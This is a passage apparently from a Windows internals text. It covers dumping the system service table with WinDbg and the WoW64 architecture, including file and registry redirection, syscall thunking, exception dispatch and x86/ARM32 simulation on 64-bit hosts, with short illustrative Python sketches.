lkd> dx (((int*)&(nt!KiServiceTable))[3] & 0xF)
(((int*)&(nt!KiServiceTable))[3] & 0xF) : 0
3.
This means the system call takes no stack-based arguments; because this is an x64
system, the call could take anywhere between 0 and 4 arguments, all of which are in
registers (RCX, RDX, R8, and R9).
4.
You could also use the debugger data model to create a LINQ predicate using projection,
dumping the entire table, leveraging the fact that the KiServiceLimit variable corresponds
to the limit field of the service descriptor table (just like W32pServiceLimit for the
Win32k.sys entries in the shadow descriptor table). The output would look like this:
lkd> dx @$table = &nt!KiServiceTable
@$table = &nt!KiServiceTable : 0xfffff8047ee24800 [Type: void *]
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->
Select(x => (x >> 4) + @$table)
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select
(x => (x >> 4) + @$table)
[0]
: 0xfffff8047eb081d0 [Type: void *]
[1]
: 0xfffff8047eb10940 [Type: void *]
[2]
: 0xfffff8047f0b7800 [Type: void *]
[3]
: 0xfffff8047f299f50 [Type: void *]
[4]
: 0xfffff8047f012450 [Type: void *]
[5]
: 0xfffff8047ebc5cc0 [Type: void *]
[6]
: 0xfffff8047f003b20 [Type: void *]
5.
You could use a more complex version of this command that would also allow you to
convert the pointers into their symbolic forms, essentially reimplementing the dps
command that works on x86 Windows:
lkd> dx @$symPrint = (x => Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\"," +
((unsigned __int64)x).ToDisplayString("x")).First())
@$symPrint = (x => Debugger.Utility.Control.ExecuteCommand(".printf \"%y\\n\"," +
((unsigned __int64)x).ToDisplayString("x")).First())
lkd> dx (((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select
(x => @$symPrint((x >> 4) + @$table))
(((int(*)[90000])&(nt!KiServiceTable)))->Take(*(int*)&nt!KiServiceLimit)->Select(x =>
@$symPrint((x >> 4) + @$table))
[0]
: nt!NtAccessCheck (fffff804`7eb081d0)
[1]
: nt!NtWorkerFactoryWorkerReady (fffff804`7eb10940)
[2]
: nt!NtAcceptConnectPort (fffff804`7f0b7800)
[3]
: nt!NtMapUserPhysicalPagesScatter (fffff804`7f299f50)
[4]
: nt!NtWaitForSingleObject (fffff804`7f012450)
[5]
: nt!NtCallbackReturn (fffff804`7ebc5cc0)
6.
As long as you are not decoding the Win32k.sys entries, you can also use the !chksvctbl -v command in the debugger,
whose output will include all of this data while also checking for inline hooks that a
rootkit may have attached:
lkd> !chksvctbl -v
# ServiceTableEntry DecodedEntryTarget(Address) CompactedOffset
==========================================================================================
0 0xfffff8047ee24800 nt!NtAccessCheck(0xfffff8047eb081d0) 0n-52191996
1 0xfffff8047ee24804 nt!NtWorkerFactoryWorkerReady(0xfffff8047eb10940) 0n-51637248
2 0xfffff8047ee24808 nt!NtAcceptConnectPort(0xfffff8047f0b7800) 0n43188226
3 0xfffff8047ee2480c nt!NtMapUserPhysicalPagesScatter(0xfffff8047f299f50) 0n74806528
4 0xfffff8047ee24810 nt!NtWaitForSingleObject(0xfffff8047f012450) 0n32359680
EXPERIMENT: Viewing system service activity
You can monitor system service activity by watching the System Calls/Sec performance counter in
the System object. Run the Performance Monitor, click Performance Monitor under Monitoring
Tools, and click the Add button to add a counter to the chart. Select the System object, select the
System Calls/Sec counter, and then click the Add button to add the counter to the chart.
It is not unusual to see hundreds of thousands of system calls a second, especially the more processors the system
has and the more applications it is running.
WoW64 (Windows-on-Windows)
WoW64 (Win32 emulation on 64-bit Windows) refers to the software that permits the execution of
32-bit applications on 64-bit platforms (which can also belong to a different architecture). WoW64
originated as a research project for running x86 code on the old Alpha and MIPS versions of Windows
NT 3.51, around the year 1995, and has drastically evolved since then. When Microsoft released Windows
XP 64-bit edition in 2001, WoW64 was included in the OS for running old x86 32-bit applications in
the new 64-bit OS. In modern Windows releases, WoW64 has been expanded to support also running
ARM32 applications and x86 applications on ARM64 systems.
The WoW64 core is implemented as a set of user-mode DLLs, with some support from the kernel for cre-
ating the target architecture's versions of what would normally only be 64-bit data structures,
such as the process environment block (PEB) and thread environment block (TEB). Changing WoW64
contexts through Get/SetThreadContext is also implemented by the kernel. Here are the core user-
mode DLLs responsible for WoW64:
■ Wow64.dll Implements the WoW64 core in user mode. Creates the thin software layer that
acts as a kind of intermediary kernel for 32-bit applications and starts the simulation. Handles
CPU context state changes and base system calls exported by Ntoskrnl.exe. It also implements
file-system redirection and registry redirection.
■ Wow64win.dll Implements thunking (conversion) for GUI system calls exported by Win32k.
sys. Both Wow64win.dll and Wow64.dll include thunking code, which converts a calling conven-
tion from one architecture to another.
The machine code of a 32-bit application may also belong to a different architecture than the
host's. In some cases (like for ARM64), the machine code needs to be emulat-
ed or jitted. In this book, we use the term jitting to refer to the just-in-time compilation technique that
involves compilation of small code blocks (called compilation units) at runtime instead of emulating
and executing one instruction at a time.
Here are the DLLs that are responsible in translating, emulating, or jitting the machine code, allow-
ing it to be run by the target operating system:
■ Wow64cpu.dll Implements the CPU simulator for running x86 32-bit code in AMD64 operating systems. Manages the 32-bit CPU context of each running thread inside WoW64 and implements processor architecture-specific support for switching from 32-bit to 64-bit mode and vice versa.
■ Wowarmhw.dll Implements the CPU simulator for running ARM32 (AArch32) applications on
ARM64 systems. It represents the ARM64 equivalent of the Wow64cpu.dll used in x86 systems.
■ Xtajit.dll Implements the CPU emulator for running x86 32-bit applications on ARM64
systems. Includes a full x86 emulator, a jitter (code compiler), and the communication protocol
between the jitter and the XTA cache server. The jitter can create compilation blocks including
ARM64 code translated from the x86 image. Those blocks are stored in a local cache.
The relationship of the WoW64 user-mode libraries (together with other core WoW64 components) is shown in Figure 8-28.
FIGURE 8-28 The WoW64 architecture.
Note Older Windows versions designed to run on Itanium machines included a full x86 emulator integrated in the WoW64 layer called Wowia32x.dll. Itanium processors were not able to natively execute x86 32-bit instructions in an efficient manner, so an emulator was needed.

A newer Insider release version of Windows also supports executing 64-bit x86 code on
ARM64 systems. A new jitter has been designed for that reason. However, emulating AMD64
code in ARM systems is not performed through WoW64. Describing the architecture of the
AMD64 emulator is outside the scope of this release of this book.
The WoW64 core
As introduced in the previous section, the WoW64 core is platform independent: It creates a software
layer for managing the execution of 32-bit code in 64-bit operating systems. The actual translation is
performed by another component called Simulator (also known as Binary Translator), which is platform specific. While the core of WoW64 is almost entirely implemented in user mode (in the Wow64.dll library), small parts of it reside in the NT kernel.
WoW64 core in the NT kernel
During system startup (phase 1), the I/O manager invokes the PsLocateSystemDlls routine, which maps
all the system DLLs supported by the system (and stores their base addresses in a global array) in the
System process user address space. This also includes WoW64 versions of Ntdll, as described by Table
8-13. Phase 2 of the process manager (PS) startup resolves some entry points of those DLLs, which are
stored in internal kernel variables. One of the exports, LdrSystemDllInitBlock, is used to transfer WoW64
information and function pointers to new WoW64 processes.
TABLE 8-13 Different Ntdll version list

Internal Name    Description
ntdll.dll        The system Ntdll mapped in every user process (except for minimal processes). This is the only version marked as required.
ntdll32.dll      32-bit x86 Ntdll mapped in WoW64 processes running in 64-bit x86 host systems.
ntdll32.dll      32-bit ARM Ntdll mapped in WoW64 processes running in 64-bit ARM host systems.
ntdllwow.dll     32-bit x86 CHPE Ntdll mapped in WoW64 processes running in 64-bit ARM host systems.
When a process is initially created, the kernel determines whether it would run under WoW64 using
an algorithm that analyzes the main process executable PE image and checks whether the correct Ntdll
version is mapped in the system. In case the system has determined that the process is WoW64, when
the kernel initializes its address space, it maps both the native Ntdll and the correct WoW64 version.
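The machine type check can be illustrated with a short sketch. This is not the kernel's actual algorithm (which also considers the mapped Ntdll versions and other factors); it only shows how the Machine field of a PE image identifies a 32-bit guest, using the standard PE machine IDs:

```python
import struct

# Standard PE machine IDs (from the PE/COFF specification).
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_FILE_MACHINE_ARMNT = 0x01C4   # ARM Thumb-2
IMAGE_FILE_MACHINE_AMD64 = 0x8664
IMAGE_FILE_MACHINE_ARM64 = 0xAA64

def pe_machine(image: bytes) -> int:
    """Return the Machine field of a PE image (e_lfanew -> 'PE\\0\\0' + COFF header)."""
    assert image[:2] == b"MZ", "not a DOS/PE image"
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    assert image[e_lfanew:e_lfanew + 4] == b"PE\0\0", "bad PE signature"
    return struct.unpack_from("<H", image, e_lfanew + 4)[0]

def runs_under_wow64(image: bytes, host_machine: int) -> bool:
    """A 32-bit guest image on a 64-bit host runs under WoW64."""
    guest = pe_machine(image)
    guest_32bit = guest in (IMAGE_FILE_MACHINE_I386, IMAGE_FILE_MACHINE_ARMNT)
    host_64bit = host_machine in (IMAGE_FILE_MACHINE_AMD64, IMAGE_FILE_MACHINE_ARM64)
    return guest_32bit and host_64bit

# Build a minimal fake header: "MZ" stub with e_lfanew = 0x40, then the COFF header.
hdr = bytearray(0x48)
hdr[:2] = b"MZ"
struct.pack_into("<I", hdr, 0x3C, 0x40)
hdr[0x40:0x44] = b"PE\0\0"
struct.pack_into("<H", hdr, 0x44, IMAGE_FILE_MACHINE_I386)
print(runs_under_wow64(bytes(hdr), IMAGE_FILE_MACHINE_AMD64))  # True
```

Note that CHPE binaries (described later in this chapter) keep the x86 machine ID, which is one reason the real check involves more than this field.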
As explained in Chapter 3 of Part 1, each nonminimal process has a PEB data structure that is accessible from user mode. For WoW64 processes, the kernel also allocates a 32-bit version of the PEB and stores a pointer to it in a small data structure (EWoW64PROCESS) linked to the main EPROCESS. The kernel then fills the data structure described by the LdrSystemDllInitBlock symbol, including pointers of Wow64 Ntdll exports.
When a thread is allocated for the process, the kernel goes through a similar process: along with the native TEB, it allocates enough memory to also store a 32-bit TEB, which immediately follows the native one. A per-thread WoW64 CPU area is also set up; it contains the 32-bit CPU context (X86_NT5_CONTEXT or ARM_CONTEXT data structures, depending on the target architecture) and a pointer of the per-thread WoW64 CPU shared data, which can be used by the Simulator. Figure 8-29 shows the internal configuration of a WoW64 process that contains an initial single thread.
FIGURE 8-29 Internal configuration of a WoW64 process with a single thread.
User-mode WoW64 core
Aside from the differences described in the previous section, the birth of the process and its initial
thread happen in the same way as for non-WoW64 processes, until the main thread starts its execution by invoking the loader initialization function, LdrpInitialize, in the native version of Ntdll. When the loader detects that the thread is the first one to run in the context of the new process, it invokes the process initialization routine, LdrpInitializeProcess, which, along with a lot of different things (see
the “Early process initialization” section of Chapter 3 in Part 1 for further details), determines whether
the process is a WoW64 one, based on the presence of the 32-bit TEB (located after the native TEB and
linked to it). In case the check succeeds, the native Ntdll sets the internal UseWoW64 global variable to 1, builds the path of the WoW64 core library, wow64.dll, and maps it above the 4-GB virtual address space (in that way, it can't interfere with the simulated 32-bit address space). It then gets the address of some WoW64 functions that deal with process/thread suspension and APC and
exception dispatching and stores them in some of its internal variables.
When the process initialization routine ends, the Windows loader transfers the execution to the
WoW64 core via the exported Wow64LdrpInitialize routine, which will never return to the caller. From now on, every new thread starts through that entry point (instead of the classical RtlUserThreadStart). The WoW64 core obtains a pointer to the CPU WoW64 area stored by the kernel at the TLS slot 1. In case the thread is the first one of the process, it invokes the WoW64 process initialization routine, which performs the following steps:
1. Tries to load the WoW64 Thunk Logging DLL (wow64log.dll). The DLL is used for logging
   WoW64 calls and is not included in commercial Windows releases, so it is simply skipped.
2. Looks up the Ntdll32 base address and function pointers thanks to the LdrSystemDllInitBlock
   structure filled by the NT kernel.
3. Initializes the file system redirection mechanism, which intercepts file system requests and
   translates their path before invoking the native system calls.
4. Initializes the WoW64 service tables, which contain pointers to system services belonging to
   the NT kernel and Win32k GUI subsystem (similar to the standard kernel system services), but
   also Console and NLS service calls (both WoW64 system service calls and redirection are covered later in this chapter.)
5. Loads the proper CPU simulator for the target architecture. The simulator's exported functions
   are resolved and stored in an internal array called BtFuncs. The array is the only link between
   the platform-specific binary translator and the WoW64 subsystem: WoW64 invokes simulator
   functions only through it (the BtCpuProcessInit function, for example, represents the simulator's
   process initialization routine).
6. Initializes the cross-process mechanism and its shared section. A synthesized work item is
   posted on the section when a WoW64 process calls an API targeting another 32-bit process
   (this operation propagates thunk operations across different processes).
7. The WoW64 layer informs the simulator (by invoking the exported BtCpuNotifyMapViewOfSection)
   that the main module and the 32-bit version of Ntdll have been mapped in the address space.
8. Stores the address of the WoW64 system call dispatcher in the Wow64Transition exported
   variable of the 32-bit version of Ntdll. This allows the system call dispatcher to work.
When the process initialization routine ends, the thread is ready to start the CPU simulation. It
prepares the 32-bit context and stack for executing the 32-bit version of the LdrInitializeThunk function. The simulation is started via the simulator's BTCpuSimulate exported function, which will never return to the caller (unless a critical error in the simulator happens).
File system redirection
To maintain application compatibility and to reduce the effort of porting applications from Win32 to
64-bit Windows, directory names were kept the same: the system directory still contains native 64-bit images. WoW64, as it intercepts all the system calls, translates all the path-related APIs and replaces various system paths with the WoW64 equivalent (which depends on the target architecture), as shown in Table 8-14.
TABLE 8-14 WoW64 redirected paths (Path, Architecture, and Redirected Location; for X86 on ARM64, a file is redirected to the SysWow64 location when it does not exist in SyChpe32)
Some directories, for compatibility and security reasons, are exempted from being redirected, such that access attempts to them made by 32-bit applications actually access the real one.
WoW64 also provides a mechanism to control the file system redirection on a per-thread basis through the Wow64DisableWow64FsRedirection and Wow64RevertWow64FsRedirection functions. This mechanism works by storing an enabled/disabled value on the TLS index 8, which is consulted by the internal WoW64 RedirectPath function. However, the mechanism can have issues because once redirection is disabled, the system no longer uses it during internal loading either. Using one of the consistent paths introduced earlier is usually a safer methodology for developers to use.
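As an illustration of the mechanism (not wow64.dll's actual RedirectPath code), the following sketch models the per-thread disable flag with thread-local storage, mirroring the TLS-slot approach described above; the function names only echo the Win32 APIs, and the single redirected prefix is a simplification:

```python
import threading

_tls = threading.local()  # stand-in for the per-thread TLS slot

def disable_fs_redirection():
    """Analogous to Wow64DisableWow64FsRedirection: per-thread opt-out."""
    old = getattr(_tls, "disabled", False)
    _tls.disabled = True
    return old

def revert_fs_redirection(old_value):
    """Analogous to Wow64RevertWow64FsRedirection: restore the saved state."""
    _tls.disabled = old_value

def redirect_path(path: str) -> str:
    """Map a system path to its 32-bit equivalent unless redirection is off."""
    if getattr(_tls, "disabled", False):
        return path
    prefix = r"c:\windows\system32"
    if path.lower().startswith(prefix):
        return r"c:\windows\syswow64" + path[len(prefix):]
    return path

print(redirect_path(r"C:\Windows\System32\kernel32.dll"))
old = disable_fs_redirection()
print(redirect_path(r"C:\Windows\System32\kernel32.dll"))  # untouched
revert_fs_redirection(old)
```

The save/restore pattern of the two control functions is what makes the real API safe to nest.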
Note Because certain 32-bit applications might indeed be aware of and able to deal with
64-bit images, a virtual directory, \Windows\Sysnative, allows any I/Os originating from a
32-bit application to this directory to be exempted from file redirection. This directory
doesn't actually exist; it is a virtual path that allows access to the real System32 directory,
even from an application running under WoW64.
Registry redirection

Applications and components store their configuration data in the registry, usually writing it during installation, when they are registered. If the same component is installed and registered both as a 32-bit binary and a 64-bit binary, the last component registered will override the registration of the previous component because they both write to the same location in the registry.
To help solve this problem transparently without introducing any code changes to 32-bit compo-
nents, the registry is split into two portions: Native and WoW64. By default, 32-bit components access
the 32-bit view, and 64-bit components access the 64-bit view. This provides a safe execution environ-
ment for 32-bit and 64-bit components and separates the 32-bit application state from the 64-bit one,
if it exists.
As discussed later in the “System calls” section, the WoW64 system call layer intercepts all the system
calls invoked by a 32-bit process. When WoW64 intercepts the registry system calls that open or create a
registry key, it translates the key path to point to the WoW64 view of the registry (unless the caller explicitly asks for the 64-bit view.) WoW64 keeps track of the redirected keys thanks to multiple tree data structures, which store the list of shared and split registry keys (and define where the system should begin the redirection). WoW64 redirects the registry at these points:
■ HKLM\SOFTWARE
■ HKEY_CLASSES_ROOT
Not the entire hive is split. Subkeys belonging to those root keys can be stored in the private
WoW64 part of the registry (in this case, the subkey is a split key). Otherwise, the subkey can be kept
shared between 32-bit and 64-bit apps (in this case, the subkey is a shared key). Under each of the split
keys (in the position tracked by an anchor node), WoW64 creates a key called WoW6432Node (for x86
applications) or WowAA32Node (for ARM32 applications), under which the 32-bit configuration information is stored. All other portions of the registry are shared between 32-bit and 64-bit applications. As an extra help, if a 32-bit application writes a REG_SZ or REG_EXPAND_SZ value that starts with %ProgramFiles% or %commonprogramfiles% to the registry, WoW64 modifies the actual values to %ProgramFiles(x86)% and %commonprogramfiles(x86)% to match the file system redirection and layout explained earlier. The 32-bit application must write exactly these strings using this case; any other data will be ignored and written normally.
An application can explicitly open the other architecture's view of the registry by passing special access flags; the RegOpenKeyEx, RegCreateKeyEx, RegOpenKeyTransacted, RegCreateKeyTransacted, and RegDeleteKeyEx functions permit this:
■ KEY_WOW64_64KEY Explicitly opens a 64-bit key from either a 32-bit or 64-bit application
■ KEY_WOW64_32KEY Explicitly opens a 32-bit key from either a 32-bit or 64-bit application
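A minimal sketch of the view selection, using the real KEY_WOW64_* flag values from winnt.h and HKLM\SOFTWARE as the split point; the string-based translation and the sample key name (Contoso) are simplified illustrations, not WoW64's actual tree walk:

```python
# Real flag values from winnt.h; everything else here is illustrative.
KEY_WOW64_64KEY = 0x0100
KEY_WOW64_32KEY = 0x0200

def translate_key(path: str, access: int, guest_is_32bit: bool) -> str:
    """Pick the registry view for an open/create request and rewrite the path."""
    want_32bit_view = (guest_is_32bit and not (access & KEY_WOW64_64KEY)) \
                      or bool(access & KEY_WOW64_32KEY)
    anchor = r"HKLM\SOFTWARE"      # simplified split point (anchor node)
    if want_32bit_view and path.upper().startswith(anchor):
        rest = path[len(anchor):]
        if not rest.upper().startswith(r"\WOW6432NODE"):
            return anchor + r"\WoW6432Node" + rest
    return path

print(translate_key(r"HKLM\SOFTWARE\Contoso", 0, guest_is_32bit=True))
# -> HKLM\SOFTWARE\WoW6432Node\Contoso
print(translate_key(r"HKLM\SOFTWARE\Contoso", KEY_WOW64_64KEY, guest_is_32bit=True))
# -> HKLM\SOFTWARE\Contoso
```

Note how the default for a 32-bit caller is the WoW64 view, and the flags override it in either direction, matching the flag semantics listed above.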
X86 simulation on AMD64 platforms
The interface of the x86 simulator for AMD64 platforms (Wow64cpu.dll) is pretty simple. The simulator
process initialization function enables the fast system call interface, depending on the presence of soft-
ware MBEC (Mode Based Execute Control is discussed in Chapter 9). When the WoW64 core starts the
simulation by invoking the BtCpuSimulate function, the simulator builds the WoW64 stack frame (based on the 32-bit CPU context provided by the WoW64 core), initializes the Turbo thunks for dispatching fast system calls, and emits a far jump to the final 32-bit entry point (at the first execution, the entry point is set to the 32-bit version of the LdrInitializeThunk loader function). When the CPU executes the far jump,
it detects that the call gate targets a 32-bit segment, thus it changes the CPU execution mode to 32-bit.
The code execution exits 32-bit mode only in case of an interrupt or a system call being dispatched.
More details about call gates are available in the Intel and AMD software development manuals.
System calls
A WoW64 process runs with 32-bit versions of the system DLLs (as well as DLLs that perform interprocess communication, such as Rpcrt4.dll). When a 32-bit application requires
assistance from the OS, it invokes functions located in the special 32-bit versions of the OS libraries.
Like their 64-bit counterparts, the OS routines can perform their job directly in user mode, or they can
require assistance from the NT kernel. In the latter case, they invoke system calls through stub func-
tions like the one implemented in the regular 64-bit Ntdll. The stub places the system call index into a
register, but, instead of issuing the native 32-bit system call instruction, it invokes the WoW64 system
call dispatcher (through the Wow64Transition variable compiled by the WoW64 core).
It emits another far jump for transitioning to the native 64-bit execution mode, exiting from the simulation. The WoW64 system call dispatcher captures the parameters associated with the system call and converts them. The conversion process is
called “thunking” and allows machine code executed following the 32-bit ABI to interoperate with 64-bit code. The ABI defines how parameter values are passed to each function and accessed through the machine code. For simple system calls that do not interpret complex data structures provided by the client (but deal with simple input and output values), the
Turbo thunks (small conversion routines implemented in the simulator) take care of the conversion and
directly invoke the native 64-bit API. Other complex APIs need the Wow64SystemServiceEx routine's
assistance, which extracts the correct WoW64 system call table number from the system call index and
invokes the correct WoW64 system call function. WoW64 system calls are implemented in the WoW64
core library and in Wow64win.dll and have the same name as the native system calls but with the
wh- prefix. (So, for example, the NtCreateFile WoW64 API is called whNtCreateFile.)
After the conversion has been correctly performed, the simulator issues the corresponding na-
tive 64-bit system call. When the native system call returns, WoW64 converts (or thunks) any output
parameters if necessary, from 64-bit to 32-bit formats, and restarts the simulation.
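The flow above can be modeled with a toy dispatcher. Everything in this sketch (the service index, the packed argument layout, the native service itself) is invented for illustration; only the shape, capturing 32-bit arguments, widening them, and dispatching to a per-index handler, follows the text:

```python
import struct

def thunk_args_32_to_64(raw32: bytes) -> list:
    """Widen a packed array of 32-bit guest values into native-size integers."""
    return [struct.unpack_from("<I", raw32, off)[0]
            for off in range(0, len(raw32), 4)]

def native_service(handle, flags):
    """Stand-in for a native 64-bit Nt* service."""
    return (handle << 32) | flags

def wow64_dispatch(index, raw32, table):
    """Thunk the guest arguments, then invoke the handler for this index."""
    args = thunk_args_32_to_64(raw32)
    return table[index](*args)

# Hypothetical service table entry; the index 0x55 is arbitrary.
service_table = {0x55: lambda h, f: native_service(h, f)}
packed = struct.pack("<II", 0x1234, 0x1)     # two 32-bit guest arguments
print(hex(wow64_dispatch(0x55, packed, service_table)))  # 0x123400000001
```

A real thunk also converts pointers and structure layouts (and converts output parameters back to 32-bit formats on return), which this sketch omits.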
Exception dispatching
Similar to WoW64 system calls, exception dispatching forces the CPU simulation to exit. When an ex-
ception happens, the NT kernel determines whether it has been generated by a thread executing user-
mode code. If so, the NT kernel builds an extended exception frame on the active stack and dispatches
the exception by returning to the user-mode KiUserExceptionDispatcher function in the 64-bit Ntdll (for
more information about exceptions, refer to the “Exception dispatching” section earlier in this chapter).
Note that a 64-bit exception frame (which includes the captured CPU context) is allocated
in the 32-bit stack that was currently active when the exception was generated. Thus, it needs
to be converted before being dispatched to the CPU simulator. This is exactly the role of the
Wow64PrepareForException function (exported by the WoW64 core library), which allocates space on
the native 64-bit stack and copies the native exception frame from the 32-bit stack in it. It then switches
to the 64-bit stack and converts both the native exception and context records to their relative 32-bit
counterpart, storing the result on the 32-bit stack (replacing the 64-bit exception frame). At this point,
the WoW64 Core can restart the simulation from the 32-bit version of the KiUserExceptionDispatcher
function, which dispatches the exception in the same way the native 32-bit Ntdll would.
32-bit user-mode APC delivery follows a similar implementation. A regular user-mode APC is
delivered through the native Ntdll's KiUserApcDispatcher. When the 64-bit kernel is about to dispatch
a user-mode APC to a WoW64 process, it maps the 32-bit APC address to a higher range of 64-bit ad-
dress space. The 64-bit Ntdll then invokes the Wow64ApcRoutine routine exported by the WoW64 core
library, which captures the native APC and context record in user mode and maps it back in the 32-bit
stack. It then prepares a 32-bit user-mode APC and context record and restarts the CPU simulation
from the 32-bit version of the KiUserApcDispatcher function, which dispatches the APC the same way
the native 32-bit Ntdll would.
ARM
ARM is a family of Reduced Instruction Set Computing (RISC) architectures originally designed by
ARM Holdings, which licenses the architecture to other companies that design and produce the final CPUs. As a result, there have been multiple releases and versions of the ARM architecture, which have quickly
evolved during the years, starting from very simple 32-bit CPUs, initially brought by the ARMv3 generation in the year 1993, up to the latest ARMv8. The latest ARM64v8.2 CPUs natively support multiple
execution modes (or states), most commonly AArch32, Thumb-2, and AArch64:
■ AArch32 is the most classical execution mode, where the CPU executes 32-bit code only and
transfers data to and from the main memory through a 32-bit bus using 32-bit registers.
■ Thumb-2 is an execution state that is a subset of the AArch32 mode. The Thumb instruction set has
been designed for improving code density in low-power embedded systems. In this mode, the CPU
can execute a mix of 16-bit and 32-bit instructions, while still accessing 32-bit registers and memory.
■ AArch64 is the modern execution mode. The CPU in this execution state has access to 64-bit
general purpose registers and can transfer data to and from the main memory through a
64-bit bus.
Windows 10 for ARM64 systems can operate in the AArch64 or Thumb-2 execution mode (AArch32
is generally not used). Thumb-2 was especially used in old Windows RT systems. The execution states and privilege levels of ARM64 processors are discussed more in depth in Chapter 9 and in the ARM Architecture Reference Manual.
Memory models
In the “Hardware side-channel vulnerabilities” section earlier in this chapter, we introduced the concept of cache coherency, which guarantees that the same data is consistently observed while accessed by multiple processors (MESI is one of the most famous cache coherency
protocols). Like the cache coherency protocol, modern CPUs also should provide a memory consis-
tency (or ordering) model for solving another problem that can arise in multiprocessor environments:
memory reordering. Some architectures (ARM64 is an example) are indeed free to re-order memory
access instructions (achieving better performance while accessing the slower memory bus). This kind
of architecture follows a weak memory model, unlike the AMD64 architecture, which follows a strong
memory model, in which memory access instructions are generally executed in program order. Weak models, although faster, bring a lot of synchronization issues when developing multiprocessor software. In contrast, a strong model is
more intuitive and stable, but it has the big drawback of being slower.
CPUs that can do memory reordering (following the weak model) provide some machine instructions that act as memory barriers. A barrier prevents the processor from reordering memory accesses before and after the barrier, helping to solve multiprocessor synchronization issues. Memory barriers are slow;
thus, they are used only when strictly needed by critical multiprocessor code in Windows, especially in
synchronization primitives (like spinlocks, mutexes, pushlocks, and so on).
As we describe in the next section, the ARM64 jitter always makes use of memory barriers while
translating x86 code in a multiprocessor environment: it cannot infer whether the code that it will
execute could be run by multiple threads in parallel at the same time (and thus have potential synchronization issues; x86 follows a strong memory model, so it does not have the reordering issue, apart from generic out-of-order execution as explained in the previous section).
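A toy translator shows why this conservative strategy is costly: every load or store gets a barrier. The "instructions" here are illustrative strings (dmb ish is a real AArch64 data memory barrier, but this is not Xtajit's actual intermediate form):

```python
# Toy binary translator: emit a data memory barrier (dmb) after every memory
# access so weakly ordered hardware preserves x86-style program order.
def translate(block):
    out = []
    for op in block:
        out.append(op)
        if op.split()[0] in ("ldr", "str"):   # memory access -> fence it
            out.append("dmb ish")
    return out

block = ["ldr x0, [x1]", "add x0, x0, #1", "str x0, [x1]"]
for insn in translate(block):
    print(insn)
```

Running this on the three-instruction block yields five instructions; a compiler that knows the original source (as with CHPE, described later) can place barriers only where they are actually needed.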
Note Other than the CPU, memory reordering can also affect the compiler, which, during
compilation time, can reorder (and possibly remove) memory references in the source
code for optimization purposes. This type of reordering is called compiler reordering,
whereas the type described in the previous section is processor reordering.
ARM32 simulation on ARM64 platforms
The simulation of ARM32 applications under ARM64 is performed in a very similar way as for x86 under
AMD64. As discussed in the previous section, an ARM64v8 CPU is capable of dynamic switching between
the AArch64 and Thumb-2 execution state (so it can execute 32-bit instructions directly in hardware).
However, the CPU cannot switch its execution state from user-mode code via a dedicated instruction, so the WoW64 layer needs to invoke the NT kernel to request the execution mode switch. To do
this, the BtCpuSimulate function, exported by the ARM-on-ARM64 CPU simulator (Wowarmhw.dll), saves
the nonvolatile AArch64 registers in the 64-bit stack, restores the 32-bit context stored in the WoW64 CPU area, and finally emits a well-defined system call (with the special syscall number –1).
The NT kernel exception handler (which, on ARM64, is the same as the syscall handler), detects that
the exception has been raised due to a system call, thus it checks the syscall number. In case the num-
ber is the special –1, the NT kernel knows that the request is due to an execution mode change coming
from WoW64. In that case, it invokes the KiEnter32BitMode routine, which sets the new execution state
for the lower EL (exception level) to AArch32, dismisses the exception, and returns to user mode.
The code starts the execution in AArch32 state. Like the x86 simulator for AMD64 systems, the execu-
tion controls return to the simulator only in case an exception is raised or a system call is invoked. Both
exceptions and system calls are dispatched in an identical way as for the x86 simulator under AMD64.
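The dispatch decision described above can be sketched as follows; the fallback handler name and the table contents are hypothetical stand-ins, and only the special –1 check mirrors the text:

```python
# Sketch of the ARM64 syscall/exception handler's decision: the special
# syscall number -1 is a request to switch the lower exception level to
# AArch32 (KiEnter32BitMode), not a real system service.
def handle_svc(syscall_number, service_table):
    if syscall_number == -1:
        return "KiEnter32BitMode"          # switch lower EL to AArch32
    return service_table.get(syscall_number, "KiRaiseInvalidSyscall")

table = {0x08: "NtWriteFile"}              # index/value are illustrative
print(handle_svc(-1, table))    # KiEnter32BitMode
print(handle_svc(0x08, table))  # NtWriteFile
```

Reserving an out-of-band index keeps the mode-switch request on the existing syscall path, so no separate kernel interface is needed.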
X86 simulation on ARM64 platforms
The x86-on-ARM64 CPU simulator (Xtajit.dll) is different from other binary translators described in the
previous sections, mostly because it cannot directly execute x86 instructions using the hardware. The
ARM64 processor is simply not able to understand any x86 instruction. Thus, the x86-on-ARM simula-
tor implements a full x86 emulator and a jitter, which can translate blocks of x86 opcodes in AArch64
code and execute the translated blocks directly.
When the simulator process initialization function (BtCpuProcessInit) is invoked for a new WoW64 process, it reads multiple configuration settings (from the registry and from the application compatibility database.) The simulator then allocates and compiles the Syscall page, which, as the name
implies, is used for emitting x86 syscalls (the page is then linked to Ntdll thanks to the Wow64Transition
variable). At this point, the simulator determines whether the process can use the XTA cache.
The simulator uses two different caches for storing precompiled code blocks: The internal cache is
allocated per-thread and contains code blocks generated by the simulator while compiling x86 code
executed by the thread (those code blocks are called jitted blocks); the external XTA cache is managed
by the XtaCache service and contains all the jitted blocks generated lazily for an x86 image by the lazy jitter (described later in this chapter.) The process initialization routine also allocates the Compiled Hybrid Executable
(CHPE) bitmap, which covers the entire 4-GB address space potentially used by a 32-bit process. The
bitmap uses a single bit to indicate that a page of memory contains CHPE code (CHPE is described later
in this chapter.)
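The bitmap's arithmetic is easy to verify with a sketch: one bit per 4-KB page of a 4-GB address space yields a 128-KB bitmap. The helper functions below are an illustration of the concept, not Xtajit's actual data structure:

```python
PAGE_SHIFT = 12                      # 4-KB pages
SPACE = 1 << 32                      # 4-GB 32-bit address space
bitmap = bytearray((SPACE >> PAGE_SHIFT) // 8)   # 1M bits -> 131072 bytes

def mark_chpe(addr, size):
    """Set the bit of every page in [addr, addr+size) as containing CHPE code."""
    for page in range(addr >> PAGE_SHIFT, ((addr + size - 1) >> PAGE_SHIFT) + 1):
        bitmap[page // 8] |= 1 << (page % 8)

def is_chpe(addr):
    """Test whether the page containing addr holds CHPE code."""
    page = addr >> PAGE_SHIFT
    return bool(bitmap[page // 8] & (1 << (page % 8)))

mark_chpe(0x10001000, 0x2000)        # two pages of hybrid code
print(len(bitmap))                   # 131072
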